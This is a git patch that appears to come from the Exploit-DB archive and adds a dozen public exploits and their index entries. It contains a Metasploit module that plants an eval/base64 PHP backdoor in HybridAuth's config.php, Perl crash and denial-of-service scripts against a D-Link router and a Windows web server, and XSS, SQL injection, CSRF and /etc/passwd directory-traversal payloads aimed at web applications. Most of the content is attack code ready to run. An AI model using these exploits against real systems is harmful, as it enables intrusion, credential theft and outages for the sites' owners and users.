From 414aad7eb085a4664950491df1d32373dacb4cdd Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 23 Aug 2014 04:40:24 +0000
Subject: [PATCH] Updated 08_23_2014

---
 files.csv                       |  12 +++
 platforms/asp/webapps/34397.txt |  15 ++++
 platforms/hardware/dos/34394.pl |  36 +++++++++
 platforms/php/remote/34390.rb   | 138 ++++++++++++++++++++++++++++++++
 platforms/php/webapps/34386.txt |  12 +++
 platforms/php/webapps/34387.txt |  21 +++++
 platforms/php/webapps/34388.txt |   9 +++
 platforms/php/webapps/34389.txt |  18 +++++
 platforms/php/webapps/34391.txt |  19 +++++
 platforms/php/webapps/34392.txt |  52 ++++++++++++
 platforms/php/webapps/34393.txt |   7 ++
 platforms/php/webapps/34396.txt |  16 ++++
 platforms/windows/dos/34395.pl  |  60 ++++++++++++++
 13 files changed, 415 insertions(+)
 create mode 100755 platforms/asp/webapps/34397.txt
 create mode 100755 platforms/hardware/dos/34394.pl
 create mode 100755 platforms/php/remote/34390.rb
 create mode 100755 platforms/php/webapps/34386.txt
 create mode 100755 platforms/php/webapps/34387.txt
 create mode 100755 platforms/php/webapps/34388.txt
 create mode 100755 platforms/php/webapps/34389.txt
 create mode 100755 platforms/php/webapps/34391.txt
 create mode 100755 platforms/php/webapps/34392.txt
 create mode 100755 platforms/php/webapps/34393.txt
 create mode 100755 platforms/php/webapps/34396.txt
 create mode 100755 platforms/windows/dos/34395.pl

diff --git a/files.csv b/files.csv
index 8380b5056..8e129a7d8 100755
--- a/files.csv
+++ b/files.csv
@@ -30971,3 +30971,15 @@ id,file,description,date,author,platform,type,port
 34383,platforms/php/webapps/34383.txt,"Social Media 'index.php' Local File Include Vulnerability",2010-07-27,"Harri Johansson",php,webapps,0
 34384,platforms/jsp/webapps/34384.txt,"Jira 4.0.1 Cross Site Scripting and Information Disclosure Vulnerabilities",2010-07-28,MaXe,jsp,webapps,0
 34385,platforms/linux/remote/34385.txt,"KVIrc <= 4.0 '\r' Carriage Return in DCC Handshake Remote Command Execution Vulnerability",2010-07-28,unic0rn,linux,remote,0
+34386,platforms/php/webapps/34386.txt,"Cetera eCommerce Multiple SQL Injection Vulnerabilities",2010-07-28,MustLive,php,webapps,0
+34387,platforms/php/webapps/34387.txt,"Cetera eCommerce Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2010-07-28,MustLive,php,webapps,0
+34388,platforms/php/webapps/34388.txt,"SPIP 2.1 'var_login' Parameter Cross Site Scripting Vulnerability",2010-07-28,dotsafe.fr,php,webapps,0
+34389,platforms/php/webapps/34389.txt,"Impact Software Ad Peeps Cross Site Scripting and HTML Injection Vulnerabilities",2010-07-27,Matt,php,webapps,0
+34390,platforms/php/remote/34390.rb,"HybridAuth install.php PHP Code Execution",2014-08-21,metasploit,php,remote,80
+34391,platforms/php/webapps/34391.txt,"Sourcefabric Campsite Multiple Cross Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",php,webapps,0
+34392,platforms/php/webapps/34392.txt,"MyIT CRM 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps,0
+34393,platforms/php/webapps/34393.txt,"Joomla! 'com_jigsaw' Component 'controller' Parameter Directory Traversal Vulnerability",2010-08-03,FL0RiX,php,webapps,0
+34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 Web Server HTTP GET Request Remote Buffer Overflow Vulnerability",2010-08-03,"Rodrigo Escobar",hardware,dos,0
+34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 'From:' Header Processing Remote Denial Of Service Vulnerability",2010-08-03,"Rodrigo Escobar",windows,dos,0
+34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 Multiple Cross Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0
+34397,platforms/asp/webapps/34397.txt,"Activedition 'activedition/aelogin.asp' Multiple Cross Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps,0
diff --git a/platforms/asp/webapps/34397.txt b/platforms/asp/webapps/34397.txt
new file mode 100755
index 000000000..743873fa4
--- /dev/null
+++ b/platforms/asp/webapps/34397.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/42164/info
+
+Activedition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Activedition 4.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/activedition/aelogin.asp?status=Fail&noreset=True&workflow='"<script><img src="x" onerror='alert(document.cookie)'&liststatus=&area=&pageid=
+
+http://www.example.com/activedition/aelogin.asp?status=Fail&noreset=True&workflow='"<script><img src="http://www.example.com/images/logo_procheckup.gif&liststatus=&area=&pageid=
+
+http://www.example.com/activedition/aelogin.asp?status=Fail&noreset=True&workflow='"<script><iframe%20src="http://www.example.com" width="600%" height="300%"&liststatus=&area=&pageid=
+
+http://www.example.com/activedition/aelogin.asp?status=&noreset=False&workflow=&liststatus=&area=&pageid='"<script><b>User Name<b><BR><input name="user"><BR><b>Password<b><BR><input type = "password" name="pass"><button onClick="">Log in</button
diff --git a/platforms/hardware/dos/34394.pl b/platforms/hardware/dos/34394.pl
new file mode 100755
index 000000000..f8461a812
--- /dev/null
+++ b/platforms/hardware/dos/34394.pl
@@ -0,0 +1,36 @@
+source: http://www.securityfocus.com/bid/42153/info
+
+D-Link WBR-2310 is prone to a remote buffer-overflow vulnerability because it fails to bounds-check user-supplied input before copying it into an insufficiently sized memory buffer. This issue occurs in the device's webserver.
+
+Exploiting this vulnerability may allow remote attackers to execute arbitrary code in the context of the affected devices webserver.
+
+D-Link WBR-2310 firmware version 1.04 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl
+use IO::Socket;
+
+        if (@ARGV < 1) {
+                usage();
+        }
+
+        $ip     = $ARGV[0];
+        $port   = $ARGV[1];
+
+        print "[+] Sending request...\n";
+
+        $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
+"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
+        print $socket "GET
+/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";
+
+        sleep(3);
+        close($socket);
+
+        print "[+] Done!\n";
+
+sub usage() {
+        print "[-] Usage: <". $0 ."> <host> <port>\n";
+        print "[-] Example: ". $0 ." 192.168.0.1 80\n";
+        exit;
+}
diff --git a/platforms/php/remote/34390.rb b/platforms/php/remote/34390.rb
new file mode 100755
index 000000000..12223a743
--- /dev/null
+++ b/platforms/php/remote/34390.rb
@@ -0,0 +1,138 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking # application config.php is overwritten
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HybridAuth install.php PHP Code Execution',
+      'Description'    => %q{
+          This module exploits a PHP code execution vulnerability in
+        HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
+        is not removed after installation allowing unauthenticated users to
+        write PHP code to the application configuration file 'config.php'.
+
+        Note: This exploit will overwrite the application configuration file
+        rendering the application unusable.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Pichaya Morimoto', # Discovery and PoC
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'References'     =>
+        [
+          ['EDB', '34273'],
+          ['OSVDB','109838']
+        ],
+      'Arch'           => ARCH_PHP,
+      'Platform'       => 'php',
+      'Targets'        =>
+        [
+          # Tested:
+          # HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
+          ['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Aug 4 2014',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])
+      ], self.class)
+  end
+
+
+  #
+  # Check:
+  # * install.php exists
+  # * config.php is writable
+  # * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2
+  #
+  def check
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')
+    if !res
+      vprint_error "#{peer} - Connection failed"
+      return Exploit::CheckCode::Unknown
+    elsif res.code == 404
+      vprint_error "#{peer} - Could not find install.php"
+    elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</
+      vprint_error "#{peer} - #{$1} is not writable"
+    elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</
+      version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first
+      vprint_status "#{peer} - Found version: #{version}"
+      if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/
+        return Exploit::CheckCode::Vulnerable
+      else
+        vprint_error "#{peer} - HybridAuth version #{version} is not vulnerable"
+      end
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  #
+  # Exploit
+  #
+  def exploit
+    # check vuln
+    if check != Exploit::CheckCode::Vulnerable
+      fail_with Exploit::Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
+    end
+
+    # write backdoor
+    print_status "#{peer} - Writing backdoor to config.php"
+    payload_param = rand(1000)
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'install.php'),
+      'data'   => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"
+    )
+    if !res
+      fail_with Failure::Unknown, "#{peer} - Connection failed"
+    elsif res.body =~ /Installation completed/
+      print_good "#{peer} - Wrote backdoor successfully"
+    else
+      fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"
+    end
+
+    # execute payload
+    code = Rex::Text.encode_base64(payload.encoded)
+    print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)"
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'config.php'),
+      'data'   => "#{payload_param}=#{code}"
+    }, 5)
+    if !res
+      print_warning "#{peer} - No response"
+    elsif res.code == 404
+      fail_with Failure::NotFound, "#{peer} - Could not find config.php"
+    elsif res.code == 200 || res.code == 500
+      print_good "#{peer} - Sent payload successfully"
+    end
+
+    # remove backdoor
+    print_status "#{peer} - Removing backdoor from config.php"
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'install.php'),
+      'data'   => 'OPENID_ADAPTER_STATUS='
+    )
+    if !res
+      print_error "#{peer} - Connection failed"
+    elsif res.body =~ /Installation completed/
+      print_good "#{peer} - Removed backdoor successfully"
+    else
+      print_warning "#{peer} - Could not remove payload from config.php"
+    end
+  end
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/34386.txt b/platforms/php/webapps/34386.txt
new file mode 100755
index 000000000..f64a2292f
--- /dev/null
+++ b/platforms/php/webapps/34386.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/42058/info
+
+Cetera eCommerce is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues can allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Cetera eCommerce 14.0 and previous versions are vulnerable; other versions may also be affected. 
+
+The following example URIs are given:
+
+http://www.example.com/cms/templates/banner.php?bannerId=1%20and%20version()=5
+http://www.example.com/cms/templates/bannerlist.php?page=-1 
\ No newline at end of file
diff --git a/platforms/php/webapps/34387.txt b/platforms/php/webapps/34387.txt
new file mode 100755
index 000000000..6b6235078
--- /dev/null
+++ b/platforms/php/webapps/34387.txt
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/42059/info
+
+Cetera eCommerce is prone to multiple cross-site-scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Cetera eCommerce version 14.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cms/templates/search.php?q=111&sobject=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+http://www.example.com/cms/templates/bannerlist.php?deleted=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+http://www.example.com/cms/templates/bannerlist.php?errorMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+http://www.example.com/cms/templates/banner.php?errorMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+http://www.example.com/account/?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+http://www.example.com/cms/index.php?messageES=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+http://www.example.com/cms/index.php?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E 
\ No newline at end of file
diff --git a/platforms/php/webapps/34388.txt b/platforms/php/webapps/34388.txt
new file mode 100755
index 000000000..970aa63ce
--- /dev/null
+++ b/platforms/php/webapps/34388.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42060/info
+
+SPIP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+SPIP version 2.1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/spip.php?page=informer_auteur&var_login[a<script>alert('XSS');</script>a]=aaa 
\ No newline at end of file
diff --git a/platforms/php/webapps/34389.txt b/platforms/php/webapps/34389.txt
new file mode 100755
index 000000000..5e7ff6626
--- /dev/null
+++ b/platforms/php/webapps/34389.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/42071/info
+
+Impact Software Ad Peeps is prone to multiple cross-site scripting vulnerabilities and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code could run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Ad Peeps 8.5d1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/adpeeps/index.php?uid="><script>alert(0)</script>
+http://www.example.com/adpeeps/index.php?loc=login_lookup&uid="><script>alert(0)</script>
+http://www.example.com/adpeeps/index.php?loc=adminlogin&uid="><script>alert(0)</script>
+http://www.example.com/adpeeps/index.php?loc=createcampaign&mode=new&uid=100000&c ampaignid="><script>alert(0)</script>
+http://www.example.com/adpeeps/index.php?loc=view_account_stats&uid=100000&type=" ><script>alert(2)</script>&period="><script>alert(1)</script>
+http://www.example.com/adpeeps/index.php?loc=view_adrates&uid="><script>alert(0)</script>
+http://www.example.com/adpeeps/index.php?loc=account_confirmation&accname="><scri pt>alert(1)</script>&loginpass="><script>alert(2)</script>&uid=100000
+http://www.example.com/adpeeps/index.php?loc=setup_account&e6=new&e12=bypass&e9=" ><script>alert(0)</script>
+http://www.example.com/adpeeps/index.php?loc=email_advertisers&uid=100000&mode=1& errors=&from="><script>alert(1)</script>&message=&subject="><script>alert(2)</script>
+http://www.example.com/adpeeps/index.php?loc=edit_ad_package&uid=100000&idno="><s cript>alert(0)</script>
diff --git a/platforms/php/webapps/34391.txt b/platforms/php/webapps/34391.txt
new file mode 100755
index 000000000..da9443efc
--- /dev/null
+++ b/platforms/php/webapps/34391.txt
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/42107/info
+
+Sourcefabric Campsite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Sourcefabric Campsite 3.3.6 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/admin/system_pref/do_edit.php?f_campsite_online=Y&f_site_title=Kora"><script>alert(document.cookie)</script>&f_site_metakeywords=11&f_site_metadescription=22&f_cache_enabled=N&f_cache_engine=APC&f_imagecache_lifetime=86400&f_secret_key=1&f_session_lifetime=1400&f_keyword_separator=%2C&f_login_num=3&f_max_upload_filesize=16M&f_smtp_www.example.com=localwww.example.com&f_smtp_port=25&f_editor_image_ratio=100&f_external_subs_management=N&f_use_replication=N&f_db_repl_www.example.com=&f_db_repl_user=&f_db_repl_pass=&f_db_repl_port=3306&f_use_campcaster=N&f_cc_www.example.comname=localwww.example.com&f_cc_www.example.comport=80&f_cc_xrpcpath=%2Fcampcaster%2FstorageServer%2Fvar%2Fxmlrpc%2F&f_cc_xrpcfile=xrLocStor.php&f_template_filter=.*%2C+CVS&save=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C HTTP/1.1
+
+
+<form action="http://www.example.com/admin/comments/index.php" method="post" name="main" >
+<input type="hidden" name="f_comment_per_page" value="20" >
+<input type="hidden" name="f_comment_search" value='1"><script>alert(document.cookie)</script>'>
+<input type="hidden" name="f_comment_order_by" value="datestamp">
+</form>
+<script>
+document.main.submit();
+</script>
diff --git a/platforms/php/webapps/34392.txt b/platforms/php/webapps/34392.txt
new file mode 100755
index 000000000..9d4f8e206
--- /dev/null
+++ b/platforms/php/webapps/34392.txt
@@ -0,0 +1,52 @@
+source: http://www.securityfocus.com/bid/42140/info
+
+MyIT CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+MyIT CRM 0.2.8.1 is vulnerable; other versions may also be affected. 
+
+Proof of Concept:
+http://XXX.XXX.XXX.XXX/index.php?page=employees:main&page_title=View%20Employees
+ 
+* The parameter 'name' in the POST request has been set to:
+>"'><img%20src%3D%26%23x6a;
+%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;
+%26%23x70;%26%23x74;%26%23x3a;alert(36078)>
+POST /?page=employees:main HTTP/1.0
+Cookie: PHPSESSID=5460a3d8ab4f72cc624e1a6744f5ecfd
+Content-Length: 159
+Accept: */*
+Accept-Language: en-US
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
+Host: demo.myitcrm.com
+Content-Type: application/x-www-form-urlencoded
+Referer: http://demo.myitcrm.com/index.php?page=employees:main&page_title=View%20Employees
+name=>"'><img%20src%3D%26%23x6a;
+%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%2
+3x70;%26%23x74;%26%23x3a;alert(36078)>&submit=Search
+* The parameter 'employee_id' in the GET request has been set to:
+>"'><img%20src%3D%26%23x6a;
+%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;
+%26%23x70;%26%23x74;%26%23x3a;alert(55255)>
+GET             /?page=employees:employee_details&employee_id=>"'><img%20src%3D%26%23x6a;
+%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%2
+3x70;%26%23x74;%26%23x3a;alert(55255)> HTTP/1.0
+Cookie: PHPSESSID=4b54d326030a5967e44f5719747a7c86
+Accept: */*
+Accept-Language: en-US
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
+Host: demo.myitcrm.com
+Referer: http://demo.myitcrm.com/?page=employees:main
+* The parameter 'page' in the POST request has been set to:
+>%22%27><img%20src%3d%22javascript:alert(35665)%22>
+POST /?page=>%22%27><img%20src%3d%22javascript:alert(35665)%22> HTTP/1.0
+Cookie: PHPSESSID=b639ec20245375dcf4b1c3f25dfdf20f
+Content-Length: 19
+Accept: */*
+Accept-Language: en-US
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
+Host: demo.myitcrm.com
+Content-Type: application/x-www-form-urlencoded
+Referer: http://demo.myitcrm.com/index.php?page=employees:main&page_title=View%20Employees
+name=&submit=Search
\ No newline at end of file
diff --git a/platforms/php/webapps/34393.txt b/platforms/php/webapps/34393.txt
new file mode 100755
index 000000000..d84c554e3
--- /dev/null
+++ b/platforms/php/webapps/34393.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/42144/info
+
+The 'com_jigsaw' component for Joomla! is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
+
+http://www.example.com/index.php?option=com_jigsaw&controller=../../../../../../../etc/passwd%00 
\ No newline at end of file
diff --git a/platforms/php/webapps/34396.txt b/platforms/php/webapps/34396.txt
new file mode 100755
index 000000000..562f6228b
--- /dev/null
+++ b/platforms/php/webapps/34396.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/42157/info
+
+FuseTalk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+FuseTalk 4.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/usersearchresults.cfm?keyword=ttm--"%20><script>alert("TheTestManager.com-
+Month of Full disclosure")</script>&FT_ACTION=SearchUsers  - (IE8
+tested)
+
+or
+
+http://www.example.com/categories.aspx?catid=76&FTVAR_SORT=date&FTVAR_SORTORDER=0017ttm-"
+style=x:expression(alert("TheTestManager")) ttm=" (IE7 test)
\ No newline at end of file
diff --git a/platforms/windows/dos/34395.pl b/platforms/windows/dos/34395.pl
new file mode 100755
index 000000000..d2c441814
--- /dev/null
+++ b/platforms/windows/dos/34395.pl
@@ -0,0 +1,60 @@
+source: http://www.securityfocus.com/bid/42155/info
+
+PMSoftware Simple Web Server is prone to a denial-of-service vulnerability.
+
+Remote attackers can exploit this issue to cause the application to stop responding, denying service to legitimate users.
+
+Simple Web Server 2.1 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/perl
+use IO::Socket;
+
+
+        $ip     = $ARGV[0];
+        $port   = $ARGV[1];
+        $conn   = $ARGV[2];
+
+        $num    = 0;
+
+
+        while ( $num <= $conn ) {
+                system("echo -n .");
+                $s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>
+"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
+
+        close($s);
+        $num++;
+        }
+
+
+#!/usr/bin/perl
+use Net::HTTP;
+
+        if (@ARGV < 1) {
+                usage();
+        }
+
+
+        $host = @ARGV[0];
+        $port = @ARGV[1];
+        $num  = 0;
+
+        print "[+] Sending request...\n";
+
+
+        while ($num <= 255) {
+                my $s = Net::HTTP->new(Host => $host, HTTPVersion => "1.0") || die $@;
+                $s->write_request(GET => "/", 'User-Agent' => "Mozilla/5.0",
+                                              'From' => chr($num));
+
+                $num++;
+                close($s);
+        }
+
+        print "\n[+] Done!\n";
+
+sub usage() {
+        print "[-] Usage: <". $0 ."> <host> <port>\n";
+        print "[-] Example: ". $0 ." 127.0.0.1 80\n";
+        exit;
+}